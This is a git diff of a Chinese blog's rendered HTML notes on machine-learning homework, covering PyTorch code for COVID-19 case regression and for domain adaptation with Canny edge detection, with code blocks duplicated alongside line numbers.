                        # 读写数据
                        import pandas as pd
                        import os
                        import csv
                        # 进度条
                        from tqdm import tqdm
                        # Pytorch
                        import torch
                        import torch.nn as nn
                        from torch.utils.data import Dataset, DataLoader, random_split
                        # 绘制学习曲线
                        from torch.utils.tensorboard import SummaryWriter

                        Some Utility Functions

                        You do not need to modify this part.

                        -
                        def same_seed(seed): 
                        """
                        Fixes random number generator seeds for reproducibility.
                        修正随机数种子以保证结果可重复性。
                        """
                        torch.backends.cudnn.deterministic = True
                        torch.backends.cudnn.benchmark = False
                        np.random.seed(seed)
                        torch.manual_seed(seed)
                        if torch.cuda.is_available():
                        torch.cuda.manual_seed_all(seed)


                        def train_valid_split(data_set, valid_ratio, seed):
                        """
                        Split provided training data into training set and validation set
                        将提供的训练数据分成训练集和验证集,返回 numpy.array 形式
                        """
                        valid_set_size = int(valid_ratio * len(data_set))
                        train_set_size = len(data_set) - valid_set_size
                        train_set, valid_set = random_split(data_set,
                        [train_set_size, valid_set_size],
                        generator=torch.Generator().manual_seed(seed))
                        return np.array(train_set), np.array(valid_set)


                        def predict(test_loader, model, device):
                        model.eval() # Set your model to evaluation mode. 将你的模型设置为评估模式。
                        preds = []
                        for x in tqdm(test_loader):
                        x = x.to(device)
                        with torch.no_grad():
                        pred = model(x)
                        preds.append(pred.detach().cpu())
                        preds = torch.cat(preds, dim=0).numpy()
                        return preds
                        +
                        1
                        2
                        3
                        4
                        5
                        6
                        7
                        8
                        9
                        10
                        11
                        12
                        13
                        14
                        15
                        16
                        17
                        18
                        19
                        20
                        21
                        22
                        23
                        24
                        25
                        26
                        27
                        28
                        29
                        30
                        31
                        32
                        33
                        34
                        35
                        36
                        def same_seed(seed): 
                        """
                        Fixes random number generator seeds for reproducibility.
                        修正随机数种子以保证结果可重复性。
                        """
                        torch.backends.cudnn.deterministic = True
                        torch.backends.cudnn.benchmark = False
                        np.random.seed(seed)
                        torch.manual_seed(seed)
                        if torch.cuda.is_available():
                        torch.cuda.manual_seed_all(seed)


                        def train_valid_split(data_set, valid_ratio, seed):
                        """
                        Split provided training data into training set and validation set
                        将提供的训练数据分成训练集和验证集,返回 numpy.array 形式
                        """
                        valid_set_size = int(valid_ratio * len(data_set))
                        train_set_size = len(data_set) - valid_set_size
                        train_set, valid_set = random_split(data_set,
                        [train_set_size, valid_set_size],
                        generator=torch.Generator().manual_seed(seed))
                        return np.array(train_set), np.array(valid_set)


                        def predict(test_loader, model, device):
                        model.eval() # Set your model to evaluation mode. 将你的模型设置为评估模式。
                        preds = []
                        for x in tqdm(test_loader):
                        x = x.to(device)
                        with torch.no_grad():
                        pred = model(x)
                        preds.append(pred.detach().cpu())
                        preds = torch.cat(preds, dim=0).numpy()
                        return preds

                        Dataset

                        -
                        class COVID19Dataset(Dataset):
                        """
                        x: 特征
                        y: 目标,如果为空,则做预测
                        """
                        def __init__(self, x, y=None):
                        if y is None:
                        self.y = y
                        else:
                        self.y = torch.FloatTensor(y) # 将数据集由 np.array 转成 torch.tensor 形式
                        self.x = torch.FloatTensor(x)


                        def __getitem__(self, idx):
                        """
                        根据索引返回数据
                        """
                        if self.y is None:
                        return self.x[idx]
                        else:
                        return self.x[idx], self.y[idx]


                        def __len__(self):
                        return len(self.x)
                        +
                        1
                        2
                        3
                        4
                        5
                        6
                        7
                        8
                        9
                        10
                        11
                        12
                        13
                        14
                        15
                        16
                        17
                        18
                        19
                        20
                        21
                        22
                        23
                        24
                        25
                        class COVID19Dataset(Dataset):
                        """
                        x: 特征
                        y: 目标,如果为空,则做预测
                        """
                        def __init__(self, x, y=None):
                        if y is None:
                        self.y = y
                        else:
                        self.y = torch.FloatTensor(y) # 将数据集由 np.array 转成 torch.tensor 形式
                        self.x = torch.FloatTensor(x)


                        def __getitem__(self, idx):
                        """
                        根据索引返回数据
                        """
                        if self.y is None:
                        return self.x[idx]
                        else:
                        return self.x[idx], self.y[idx]


                        def __len__(self):
                        return len(self.x)

                        Neural Network Model

                        通过修改下面的类,尝试不同的模型架构。

                        -
                        class My_Model(nn.Module):
                        def __init__(self, input_dim):
                        super(My_Model, self).__init__() # 调用父类 nn.Module 的 __init__
                        # TODO: 修改模型的结构,注意维度。
                        # 定义 lyaers 变量,构造神经网络结构
                        self.layers = nn.Sequential(
                        nn.Linear(input_dim, 16),
                        nn.ReLU(), # 激活函数:ReLU
                        nn.Linear(16, 8), # 输入特征数 16,输出特征数 8
                        nn.ReLU(),
                        nn.Linear(8, 1) # # 输入特征数 8,输出特征数 1(回归问题)
                        )


                        def forward(self, x):
                        x = self.layers(x)
                        x = x.squeeze(1) # 对数组维度进行压缩 (B, 1) -> (B)
                        return x
                        +
                        1
                        2
                        3
                        4
                        5
                        6
                        7
                        8
                        9
                        10
                        11
                        12
                        13
                        14
                        15
                        16
                        17
                        18
                        class My_Model(nn.Module):
                        def __init__(self, input_dim):
                        super(My_Model, self).__init__() # 调用父类 nn.Module 的 __init__
                        # TODO: 修改模型的结构,注意维度。
                        # 定义 lyaers 变量,构造神经网络结构
                        self.layers = nn.Sequential(
                        nn.Linear(input_dim, 16),
                        nn.ReLU(), # 激活函数:ReLU
                        nn.Linear(16, 8), # 输入特征数 16,输出特征数 8
                        nn.ReLU(),
                        nn.Linear(8, 1) # # 输入特征数 8,输出特征数 1(回归问题)
                        )


                        def forward(self, x):
                        x = self.layers(x)
                        x = x.squeeze(1) # 对数组维度进行压缩 (B, 1) -> (B)
                        return x

                        Feature Selection

                        通过修改下面的函数,选择你认为有用的特征。

                        -
                        def select_feat(train_data, valid_data, test_data,
                        select_all=True):
                        """
                        选择有用的特征来进行回归。
                        """
                        y_train, y_valid = train_data[:, -1], valid_data[:, -1]
                        raw_x_train, raw_x_valid, raw_x_test = train_data[:, :-1], valid_data[:, :-1], test_data

                        if select_all:
                        feat_idx = list(range(raw_x_train.shape[1]))
                        else:
                        feat_idx = [0, 1, 2, 3, 4] # TODO: 选择合适的特征列

                        return raw_x_train[:, feat_idx], raw_x_valid[:, feat_idx], raw_x_test[:, feat_idx], \
                        y_train, y_valid
                        +
                        1
                        2
                        3
                        4
                        5
                        6
                        7
                        8
                        9
                        10
                        11
                        12
                        13
                        14
                        15
                        def select_feat(train_data, valid_data, test_data,
                        select_all=True):
                        """
                        选择有用的特征来进行回归。
                        """
                        y_train, y_valid = train_data[:, -1], valid_data[:, -1]
                        raw_x_train, raw_x_valid, raw_x_test = train_data[:, :-1], valid_data[:, :-1], test_data

                        if select_all:
                        feat_idx = list(range(raw_x_train.shape[1]))
                        else:
                        feat_idx = [0, 1, 2, 3, 4] # TODO: 选择合适的特征列

                        return raw_x_train[:, feat_idx], raw_x_valid[:, feat_idx], raw_x_test[:, feat_idx], \
                        y_train, y_valid

                        Training Loop

                        -
                        def trainer(train_loader, valid_loader, model, config, device):
                        # 定义损失函数
                        criterion = nn.MSELoss(reduction='mean')
                        # 定义优化函数
                        # TODO: 访问 Please check https://pytorch.org/docs/stable/optim.html 了解更多可用函数
                        # TODO: L2 正则化,或自行实现
                        optimizer = torch.optim.SGD(model.parameters(), lr=config['learning_rate'], momentum=0.9)

                        writer = SummaryWriter() # 可视化工具 tensorboard

                        if not os.path.isdir('./models'):
                        os.mkdir('./models') # 新建一个文件夹以保存模型

                        n_epochs, best_loss, step, early_stop_count = config['n_epochs'], math.inf, 0, 0

                        for epoch in range(n_epochs):
                        model.train() # 将你的模型设为训练模式
                        loss_record = []

                        # tqdm 是一个可视化训练进度的包
                        train_pbar = tqdm(train_loader, position=0, leave=True)

                        for x, y in train_pbar:
                        optimizer.zero_grad() # 将梯度设为 0
                        x, y = x.to(device), y.to(device) # 将数据读入设备
                        pred = model(x)
                        loss = criterion(pred, y)
                        loss.backward() # 计算梯度(backpropagation 方法)
                        optimizer.step() # 更新参数
                        step += 1
                        loss_record.append(loss.detach().item())

                        # 在进度条显示当前 epoch 次数和损失函数的值
                        train_pbar.set_description(f'Epoch [{epoch+1} / {n_epochs}]')
                        train_pbar.set_postfix({'loss': loss.detach().item()})

                        mean_train_loss = sum(loss_record) / len(loss_record)
                        writer.add_scalar('Loss/train', mean_train_loss, step)

                        model.eval() # 将你的模型设为评估模式
                        loss_record = []
                        for x, y in valid_loader:
                        x, y = x.to(device), y.to(device)
                        with torch.no_grad():
                        pred = model(x)
                        loss = criterion(pred, y)

                        loss_record.append(loss.item())

                        mean_valid_loss = sum(loss_record) / len(loss_record)
                        print(f'Epoch [{epoch + 1} / {n_epochs}]: Train loss: {mean_train_loss: .4f},\
                        Valid loss: {mean_valid_loss: .4f}')
                        writer.add_scalar('Loss/valid', mean_valid_loss, step)

                        if mean_valid_loss < best_loss:
                        best_loss = mean_valid_loss
                        torch.save(model.state_dict(), config['save_path']) # 保存你最好的模型
                        print('Saving model with loss {:.3f}...'.format(best_loss))
                        early_stop_count = 0
                        else:
                        early_stop_count += 1

                        if early_stop_count >= config['early_stop']:
                        # 模型没有改善,所以我们停止了训练
                        print('\nModel is not improving, so we halt the training session.')
                        return
                        +
                        1
                        2
                        3
                        4
                        5
                        6
                        7
                        8
                        9
                        10
                        11
                        12
                        13
                        14
                        15
                        16
                        17
                        18
                        19
                        20
                        21
                        22
                        23
                        24
                        25
                        26
                        27
                        28
                        29
                        30
                        31
                        32
                        33
                        34
                        35
                        36
                        37
                        38
                        39
                        40
                        41
                        42
                        43
                        44
                        45
                        46
                        47
                        48
                        49
                        50
                        51
                        52
                        53
                        54
                        55
                        56
                        57
                        58
                        59
                        60
                        61
                        62
                        63
                        64
                        65
                        66
                        def trainer(train_loader, valid_loader, model, config, device):
                        # 定义损失函数
                        criterion = nn.MSELoss(reduction='mean')
                        # 定义优化函数
                        # TODO: 访问 Please check https://pytorch.org/docs/stable/optim.html 了解更多可用函数
                        # TODO: L2 正则化,或自行实现
                        optimizer = torch.optim.SGD(model.parameters(), lr=config['learning_rate'], momentum=0.9)

                        writer = SummaryWriter() # 可视化工具 tensorboard

                        if not os.path.isdir('./models'):
                        os.mkdir('./models') # 新建一个文件夹以保存模型

                        n_epochs, best_loss, step, early_stop_count = config['n_epochs'], math.inf, 0, 0

                        for epoch in range(n_epochs):
                        model.train() # 将你的模型设为训练模式
                        loss_record = []

                        # tqdm 是一个可视化训练进度的包
                        train_pbar = tqdm(train_loader, position=0, leave=True)

                        for x, y in train_pbar:
                        optimizer.zero_grad() # 将梯度设为 0
                        x, y = x.to(device), y.to(device) # 将数据读入设备
                        pred = model(x)
                        loss = criterion(pred, y)
                        loss.backward() # 计算梯度(backpropagation 方法)
                        optimizer.step() # 更新参数
                        step += 1
                        loss_record.append(loss.detach().item())

                        # 在进度条显示当前 epoch 次数和损失函数的值
                        train_pbar.set_description(f'Epoch [{epoch+1} / {n_epochs}]')
                        train_pbar.set_postfix({'loss': loss.detach().item()})

                        mean_train_loss = sum(loss_record) / len(loss_record)
                        writer.add_scalar('Loss/train', mean_train_loss, step)

                        model.eval() # 将你的模型设为评估模式
                        loss_record = []
                        for x, y in valid_loader:
                        x, y = x.to(device), y.to(device)
                        with torch.no_grad():
                        pred = model(x)
                        loss = criterion(pred, y)

                        loss_record.append(loss.item())

                        mean_valid_loss = sum(loss_record) / len(loss_record)
                        print(f'Epoch [{epoch + 1} / {n_epochs}]: Train loss: {mean_train_loss: .4f},\
                        Valid loss: {mean_valid_loss: .4f}')
                        writer.add_scalar('Loss/valid', mean_valid_loss, step)

                        if mean_valid_loss < best_loss:
                        best_loss = mean_valid_loss
                        torch.save(model.state_dict(), config['save_path']) # 保存你最好的模型
                        print('Saving model with loss {:.3f}...'.format(best_loss))
                        early_stop_count = 0
                        else:
                        early_stop_count += 1

                        if early_stop_count >= config['early_stop']:
                        # 模型没有改善,所以我们停止了训练
                        print('\nModel is not improving, so we halt the training session.')
                        return

                        Configurations

                        配置

                        config 包含了 超参数 和 模型保存路径。

                        -
                        device = 'cuda' if torch.cuda.is_available() else 'cpu'
                        config = {
                        'seed': 5201314, # 随机数种子
                        'select_all': True, # 是否使用所有特征
                        'valid_ratio': 0.2, # 验证集大小 = 训练集大小 * valid_ratio
                        'n_epochs': 3000, # epoch 数量
                        'batch_size': 256, # batch 大小
                        'learning_rate': 1e-5, # 学习率
                        'early_stop': 400, # 如果模型训练在这么多次尝试后都没有得到改善,停止训练。
                        'save_path': './models/model.ckpt' # 模型保存路径
                        }
                        +
                        1
                        2
                        3
                        4
                        5
                        6
                        7
                        8
                        9
                        10
                        11
                        device = 'cuda' if torch.cuda.is_available() else 'cpu'
                        config = {
                        'seed': 5201314, # 随机数种子
                        'select_all': True, # 是否使用所有特征
                        'valid_ratio': 0.2, # 验证集大小 = 训练集大小 * valid_ratio
                        'n_epochs': 3000, # epoch 数量
                        'batch_size': 256, # batch 大小
                        'learning_rate': 1e-5, # 学习率
                        'early_stop': 400, # 如果模型训练在这么多次尝试后都没有得到改善,停止训练。
                        'save_path': './models/model.ckpt' # 模型保存路径
                        }

                        Dataloader

                        Read data from files and set up training, validation, and testing sets. You do not need to modify this part.

                        -
                        # Set seed for reproducibility
                        same_seed(config['seed'])

                        # train_data size: 2699 x 118 (id + 37states + 16 features x 5 days)
                        # test_data size: 1078 x 117 (without last day's positive rate)
                        train_data, test_data = pd.read_csv('./covid.train.csv').values,\
                        pd.read_csv('./covid.test.csv').values
                        train_data, valid_data = train_valid_split(train_data,
                        config['valid_ratio'],
                        config['seed'])

                        # Print out the data size.
                        print(f"""train_data size: {train_data.shape}
                        valid_data size: {valid_data.shape}
                        test_data size: {test_data.shape}""")

                        # Select features
                        x_train, x_valid, x_test, y_train, y_valid = select_feat(train_data,
                        valid_data,
                        test_data,
                        config['select_all'])

                        # Print out the number of features.
                        print(f'number of features: {x_train.shape[1]}')

                        train_dataset, valid_dataset, test_dataset = COVID19Dataset(x_train, y_train), \
                        COVID19Dataset(x_valid, y_valid), \
                        COVID19Dataset(x_test)

                        # Pytorch data loader loads pytorch dataset into batches.
                        train_loader = DataLoader(train_dataset, batch_size=config['batch_size'],
                        shuffle=True,
                        pin_memory=True)
                        valid_loader = DataLoader(valid_dataset, batch_size=config['batch_size'],
                        shuffle=True,
                        pin_memory=True)
                        test_loader = DataLoader(test_dataset, batch_size=config['batch_size'],
                        shuffle=False,
                        pin_memory=True)
                        +
                        1
                        2
                        3
                        4
                        5
                        6
                        7
                        8
                        9
                        10
                        11
                        12
                        13
                        14
                        15
                        16
                        17
                        18
                        19
                        20
                        21
                        22
                        23
                        24
                        25
                        26
                        27
                        28
                        29
                        30
                        31
                        32
                        33
                        34
                        35
                        36
                        37
                        38
                        39
                        # Set seed for reproducibility
                        same_seed(config['seed'])

                        # train_data size: 2699 x 118 (id + 37states + 16 features x 5 days)
                        # test_data size: 1078 x 117 (without last day's positive rate)
                        train_data, test_data = pd.read_csv('./covid.train.csv').values,\
                        pd.read_csv('./covid.test.csv').values
                        train_data, valid_data = train_valid_split(train_data,
                        config['valid_ratio'],
                        config['seed'])

                        # Print out the data size.
                        print(f"""train_data size: {train_data.shape}
                        valid_data size: {valid_data.shape}
                        test_data size: {test_data.shape}""")

                        # Select features
                        x_train, x_valid, x_test, y_train, y_valid = select_feat(train_data,
                        valid_data,
                        test_data,
                        config['select_all'])

                        # Print out the number of features.
                        print(f'number of features: {x_train.shape[1]}')

                        train_dataset, valid_dataset, test_dataset = COVID19Dataset(x_train, y_train), \
                        COVID19Dataset(x_valid, y_valid), \
                        COVID19Dataset(x_test)

                        # Pytorch data loader loads pytorch dataset into batches.
                        train_loader = DataLoader(train_dataset, batch_size=config['batch_size'],
                        shuffle=True,
                        pin_memory=True)
                        valid_loader = DataLoader(valid_dataset, batch_size=config['batch_size'],
                        shuffle=True,
                        pin_memory=True)
                        test_loader = DataLoader(test_dataset, batch_size=config['batch_size'],
                        shuffle=False,
                        pin_memory=True)
                        train_data size: (2160, 118) 
                         valid_data size: (539, 118) 
                         test_data size: (1078, 117)
                         number of features: 117
                         

                        Start training!

                        -
                        # put your model and data on the same computation device.
                        # 把你的模型和数据放在同一个计算设备上。
                        model = My_Model(input_dim=x_train.shape[1]).to(device)
                        trainer(train_loader, valid_loader, model, config, device)
                        +
                        1
                        2
                        3
                        4
                        # put your model and data on the same computation device.
                        # 把你的模型和数据放在同一个计算设备上。
                        model = My_Model(input_dim=x_train.shape[1]).to(device)
                        trainer(train_loader, valid_loader, model, config, device)

                        Plot learning curves with tensorboard (optional)

                        可视化训练结果。

                        tensorboard is a tool that allows you to visualize your training progress.

                        If this block does not display your learning curve, please wait for few minutes, and re-run this block. It might take some time to load your logging information.

                        -
                        %reload_ext tensorboard
                        %tensorboard --logdir=./runs/
                        +
                        1
                        2
                        %reload_ext tensorboard
                        %tensorboard --logdir=./runs/

                        此处会在 Jupyter Nodebook 中显示 tensorboard

                        Testing

                        The predictions of your model on testing set will be stored at pred.csv.

                        -
                        def save_pred(preds, file):
                        ''' Save predictions to specified file '''
                        with open(file, 'w') as fp:
                        writer = csv.writer(fp)
                        writer.writerow(['id', 'tested_positive'])
                        for i, p in enumerate(preds):
                        writer.writerow([i, p])

                        model = My_Model(input_dim=x_train.shape[1]).to(device)
                        model.load_state_dict(torch.load(config['save_path']))
                        preds = predict(test_loader, model, device)
                        save_pred(preds, 'pred.csv')
                        +
                        1
                        2
                        3
                        4
                        5
                        6
                        7
                        8
                        9
                        10
                        11
                        12
                        def save_pred(preds, file):
                        ''' Save predictions to specified file '''
                        with open(file, 'w') as fp:
                        writer = csv.writer(fp)
                        writer.writerow(['id', 'tested_positive'])
                        for i, p in enumerate(preds):
                        writer.writerow([i, p])

                        model = My_Model(input_dim=x_train.shape[1]).to(device)
                        model.load_state_dict(torch.load(config['save_path']))
                        preds = predict(test_loader, model, device)
                        save_pred(preds, 'pred.csv')
                        100%|██████████| 5/5 [00:00<00:00, 500.02it/s]
                         
                        @@ -5437,6 +5435,8 @@

                        目录

                        var highlightShrink = ""; var HighlightHeightLimit = ""; + + diff --git "a/posts/ML-\346\235\216\345\256\217\346\257\205-Lecture 10-Attack/index.html" "b/posts/ML-\346\235\216\345\256\217\346\257\205-Lecture 10-Attack/index.html" index 634ddce278..0a4127edf3 100644 --- "a/posts/ML-\346\235\216\345\256\217\346\257\205-Lecture 10-Attack/index.html" +++ "b/posts/ML-\346\235\216\345\256\217\346\257\205-Lecture 10-Attack/index.html" @@ -44,8 +44,6 @@ - - @@ -4634,6 +4632,8 @@

                        目录

                        var highlightShrink = ""; var HighlightHeightLimit = ""; + + diff --git "a/posts/ML-\346\235\216\345\256\217\346\257\205-Lecture 11-Adaptation/index.html" "b/posts/ML-\346\235\216\345\256\217\346\257\205-Lecture 11-Adaptation/index.html" index e6eae143e5..4540f40d9e 100644 --- "a/posts/ML-\346\235\216\345\256\217\346\257\205-Lecture 11-Adaptation/index.html" +++ "b/posts/ML-\346\235\216\345\256\217\346\257\205-Lecture 11-Adaptation/index.html" @@ -44,8 +44,6 @@ - - @@ -714,32 +712,32 @@

                        hw11_d

                        ​ 我们将使用照片和标签训练模型,并尝试预测手绘涂鸦的标签是什么。

                        ​ 数据可以在这里下载。下面的代码用于数据下载和可视化。

                        ​ 注意:源数据和目标数据都是平衡数据,您可以使用此信息。

                        -
                        # Download dataset
                        !wget "https://github.com/redxouls/ml2020spring-hw11-dataset/releases/download/v1.0.0/real_or_drawing.zip" -O real_or_drawing.zip

                        # Download from mirrored dataset link
                        # !wget "https://github.com/redxouls/ml2020spring-hw11-dataset/releases/download/v1.0.1/real_or_drawing.zip" -O real_or_drawing.zip
                        # !wget "https://github.com/redxouls/ml2020spring-hw11-dataset/releases/download/v1.0.2/real_or_drawing.zip" -O real_or_drawing.zip

                        # Unzip the files
                        !unzip real_or_drawing.zip
                        -
                        Streaming output truncated to the last 5000 lines.
                        inflating: real_or_drawing/train_data/0/106.bmp
                        inflating: real_or_drawing/train_data/0/107.bmp
                        inflating: real_or_drawing/train_data/0/108.bmp
                        inflating: real_or_drawing/train_data/0/109.bmp
                        inflating: real_or_drawing/train_data/0/11.bmp
                        ...
                        -
                        import matplotlib.pyplot as plt

                        def no_axis_show(img, title='', cmap=None):
                        # imshow, and set the interpolation mode to be "nearest"。
                        fig = plt.imshow(img, interpolation='nearest', cmap=cmap)
                        # do not show the axes in the images.
                        fig.axes.get_xaxis().set_visible(False)
                        fig.axes.get_yaxis().set_visible(False)
                        plt.title(title)

                        titles = ['horse', 'bed', 'clock', 'apple', 'cat', 'plane', 'television', 'dog', 'dolphin', 'spider']
                        plt.figure(figsize=(18, 18))
                        for i in range(10):
                        plt.subplot(1, 10, i+1)
                        fig = no_axis_show(plt.imread(f'real_or_drawing/train_data/{i}/{500*i}.bmp'), title=titles[i])
                        +
                        1
                        2
                        3
                        4
                        5
                        6
                        7
                        8
                        9
                        # Download dataset
                        !wget "https://github.com/redxouls/ml2020spring-hw11-dataset/releases/download/v1.0.0/real_or_drawing.zip" -O real_or_drawing.zip

                        # Download from mirrored dataset link
                        # !wget "https://github.com/redxouls/ml2020spring-hw11-dataset/releases/download/v1.0.1/real_or_drawing.zip" -O real_or_drawing.zip
                        # !wget "https://github.com/redxouls/ml2020spring-hw11-dataset/releases/download/v1.0.2/real_or_drawing.zip" -O real_or_drawing.zip

                        # Unzip the files
                        !unzip real_or_drawing.zip
                        +
                        1
                        2
                        3
                        4
                        5
                        6
                        7
                        Streaming output truncated to the last 5000 lines.
                        inflating: real_or_drawing/train_data/0/106.bmp
                        inflating: real_or_drawing/train_data/0/107.bmp
                        inflating: real_or_drawing/train_data/0/108.bmp
                        inflating: real_or_drawing/train_data/0/109.bmp
                        inflating: real_or_drawing/train_data/0/11.bmp
                        ...
                        +
                        1
                        2
                        3
                        4
                        5
                        6
                        7
                        8
                        9
                        10
                        11
                        12
                        13
                        14
                        15
                        import matplotlib.pyplot as plt

                        def no_axis_show(img, title='', cmap=None):
                        # imshow, and set the interpolation mode to be "nearest"。
                        fig = plt.imshow(img, interpolation='nearest', cmap=cmap)
                        # do not show the axes in the images.
                        fig.axes.get_xaxis().set_visible(False)
                        fig.axes.get_yaxis().set_visible(False)
                        plt.title(title)

                        titles = ['horse', 'bed', 'clock', 'apple', 'cat', 'plane', 'television', 'dog', 'dolphin', 'spider']
                        plt.figure(figsize=(18, 18))
                        for i in range(10):
                        plt.subplot(1, 10, i+1)
                        fig = no_axis_show(plt.imread(f'real_or_drawing/train_data/{i}/{500*i}.bmp'), title=titles[i])

                        png

                        -
                        plt.figure(figsize=(18, 18))
                        for i in range(10):
                        plt.subplot(1, 10, i+1)
                        fig = no_axis_show(plt.imread(f'real_or_drawing/test_data/0/' + str(i).rjust(5, '0') + '.bmp'))
                        +
                        1
                        2
                        3
                        4
                        plt.figure(figsize=(18, 18))
                        for i in range(10):
                        plt.subplot(1, 10, i+1)
                        fig = no_axis_show(plt.imread(f'real_or_drawing/test_data/0/' + str(i).rjust(5, '0') + '.bmp'))

                        png

                        特殊领域知识

                        ​ 我们在涂鸦时,通常只画轮廓,因此我们可以对源数据进行边缘检测处理,使其与目标数据更加相似。

                        Canny 边缘检测

                        ​ Canny Edge Detection 的实现如下。 此处不会详细描述该算法。如果您有兴趣,请参考 wiki 或这里

                        ​ 我们只需要两个参数即可使用 CV2 实现 Canny Edge Detection:low_thresholdhigh_threshold

                        -
                        cv2.Canny(image, low_threshold, high_threshold)
                        +
                        1
                        cv2.Canny(image, low_threshold, high_threshold)

                        ​ 简单地说,当边值超过 high_threshold 时,我们将其确定为边。如果边值仅高于 low_threshold,我们将确定它是否为边。

                        ​ 让我们在源数据上实现它。

                        -
                        import cv2
                        import matplotlib.pyplot as plt
                        titles = ['horse', 'bed', 'clock', 'apple', 'cat', 'plane', 'television', 'dog', 'dolphin', 'spider']
                        plt.figure(figsize=(18, 18))

                        original_img = plt.imread(f'real_or_drawing/train_data/0/0.bmp')
                        plt.subplot(1, 5, 1)
                        no_axis_show(original_img, title='original')

                        gray_img = cv2.cvtColor(original_img, cv2.COLOR_RGB2GRAY)
                        plt.subplot(1, 5, 2)
                        no_axis_show(gray_img, title='gray scale', cmap='gray')

                        gray_img = cv2.cvtColor(original_img, cv2.COLOR_RGB2GRAY)
                        plt.subplot(1, 5, 2)
                        no_axis_show(gray_img, title='gray scale', cmap='gray')

                        canny_50100 = cv2.Canny(gray_img, 50, 100)
                        plt.subplot(1, 5, 3)
                        no_axis_show(canny_50100, title='Canny(50, 100)', cmap='gray')

                        canny_150200 = cv2.Canny(gray_img, 150, 200)
                        plt.subplot(1, 5, 4)
                        no_axis_show(canny_150200, title='Canny(150, 200)', cmap='gray')

                        canny_250300 = cv2.Canny(gray_img, 250, 300)
                        plt.subplot(1, 5, 5)
                        no_axis_show(canny_250300, title='Canny(250, 300)', cmap='gray')
                        +
                        1
                        2
                        3
                        4
                        5
                        6
                        7
                        8
                        9
                        10
                        11
                        12
                        13
                        14
                        15
                        16
                        17
                        18
                        19
                        20
                        21
                        22
                        23
                        24
                        25
                        26
                        27
                        28
                        import cv2
                        import matplotlib.pyplot as plt
                        titles = ['horse', 'bed', 'clock', 'apple', 'cat', 'plane', 'television', 'dog', 'dolphin', 'spider']
                        plt.figure(figsize=(18, 18))

                        original_img = plt.imread(f'real_or_drawing/train_data/0/0.bmp')
                        plt.subplot(1, 5, 1)
                        no_axis_show(original_img, title='original')

                        gray_img = cv2.cvtColor(original_img, cv2.COLOR_RGB2GRAY)
                        plt.subplot(1, 5, 2)
                        no_axis_show(gray_img, title='gray scale', cmap='gray')

                        gray_img = cv2.cvtColor(original_img, cv2.COLOR_RGB2GRAY)
                        plt.subplot(1, 5, 2)
                        no_axis_show(gray_img, title='gray scale', cmap='gray')

                        canny_50100 = cv2.Canny(gray_img, 50, 100)
                        plt.subplot(1, 5, 3)
                        no_axis_show(canny_50100, title='Canny(50, 100)', cmap='gray')

                        canny_150200 = cv2.Canny(gray_img, 150, 200)
                        plt.subplot(1, 5, 4)
                        no_axis_show(canny_150200, title='Canny(150, 200)', cmap='gray')

                        canny_250300 = cv2.Canny(gray_img, 250, 300)
                        plt.subplot(1, 5, 5)
                        no_axis_show(canny_250300, title='Canny(250, 300)', cmap='gray')

                        png

                        数据处理

                        ​ 数据适用于 。您可以使用 创建数据集。图像增广的详细信息请参考以下代码中的注释。torchvision.ImageFolder torchvision.ImageFolder

                        -
                        import numpy as np
                        import torch # 张量操作
                        import torch.nn as nn # 神经网络层
                        import torch.nn.functional as F
                        from torch.autograd import Function # 自动微分

                        import torch.optim as optim # 优化器
                        import torchvision.transforms as transforms
                        from torchvision.datasets import ImageFolder
                        from torch.utils.data import DataLoader

                        # source_transform 使用 Canny 算法进行边缘检测,然后应用了一些数据增强操作,如翻转和旋转。
                        source_transform = transforms.Compose([
                        # Turn RGB to grayscale. (Bacause Canny do not support RGB images.)
                        transforms.Grayscale(), # 转换为灰度图
                        # cv2 do not support skimage.Image, so we transform it to np.array,
                        # and then adopt cv2.Canny algorithm.
                        transforms.Lambda(lambda x: cv2.Canny(np.array(x), 170, 300)), # 应用 Canny 边缘检测
                        # Transform np.array back to the skimage.Image.
                        transforms.ToPILImage(), # 转换为 PIL 图像对象
                        # 50% Horizontal Flip. (For Augmentation)
                        transforms.RandomHorizontalFlip(), # 50% 概率水平翻转
                        # Rotate +- 15 degrees. (For Augmentation), and filled with zero
                        # if there's empty pixel after rotation.
                        transforms.RandomRotation(15, fill=(0,)), # 旋转 ±15 度,空白像素填充为 0
                        # Transform to tensor for model inputs.
                        transforms.ToTensor(), # 转换为 PyTorch 张量
                        ])

                        # target_transform 则不包含边缘检测,而是对图像大小进行了调整(从 28x28 调整到 32x32),以便与训练数据一致。
                        target_transform = transforms.Compose([
                        # Turn RGB to grayscale.
                        transforms.Grayscale(),
                        # Resize: size of source data is 32x32, thus we need to
                        # enlarge the size of target data from 28x28 to 32x32。
                        transforms.Resize((32, 32)), # 调整大小到 32x32
                        # 50% Horizontal Flip. (For Augmentation)
                        transforms.RandomHorizontalFlip(),
                        # Rotate +- 15 degrees. (For Augmentation), and filled with zero
                        # if there's empty pixel after rotation.
                        transforms.RandomRotation(15, fill=(0,)),
                        # Transform to tensor for model inputs.
                        transforms.ToTensor(),
                        ])

                        # ImageFolder 类从指定路径加载图像文件夹中的数据,并将 source_transform 和 target_transform 应用于图像数据。
                        source_dataset = ImageFolder('real_or_drawing/train_data', transform=source_transform)
                        target_dataset = ImageFolder('real_or_drawing/test_data', transform=target_transform)

                        # 这里的 DataLoader 为训练和测试集创建批量加载器,将数据分批次加载到模型中。
                        # batch_size=32 表示每个批次包含 32 张图像,shuffle=True 用于随机打乱训练集的顺序,有助于减少过拟合。
                        # test_dataloader 用于加载测试数据,shuffle=False 表示测试集的顺序不会被打乱。
                        source_dataloader = DataLoader(source_dataset, batch_size=32, shuffle=True)
                        target_dataloader = DataLoader(target_dataset, batch_size=32, shuffle=True)
                        test_dataloader = DataLoader(target_dataset, batch_size=128, shuffle=False)
                        +
                        1
                        2
                        3
                        4
                        5
                        6
                        7
                        8
                        9
                        10
                        11
                        12
                        13
                        14
                        15
                        16
                        17
                        18
                        19
                        20
                        21
                        22
                        23
                        24
                        25
                        26
                        27
                        28
                        29
                        30
                        31
                        32
                        33
                        34
                        35
                        36
                        37
                        38
                        39
                        40
                        41
                        42
                        43
                        44
                        45
                        46
                        47
                        48
                        49
                        50
                        51
                        52
                        53
                        54
                        55
                        import numpy as np
                        import torch # 张量操作
                        import torch.nn as nn # 神经网络层
                        import torch.nn.functional as F
                        from torch.autograd import Function # 自动微分

                        import torch.optim as optim # 优化器
                        import torchvision.transforms as transforms
                        from torchvision.datasets import ImageFolder
                        from torch.utils.data import DataLoader

                        # source_transform 使用 Canny 算法进行边缘检测,然后应用了一些数据增强操作,如翻转和旋转。
                        source_transform = transforms.Compose([
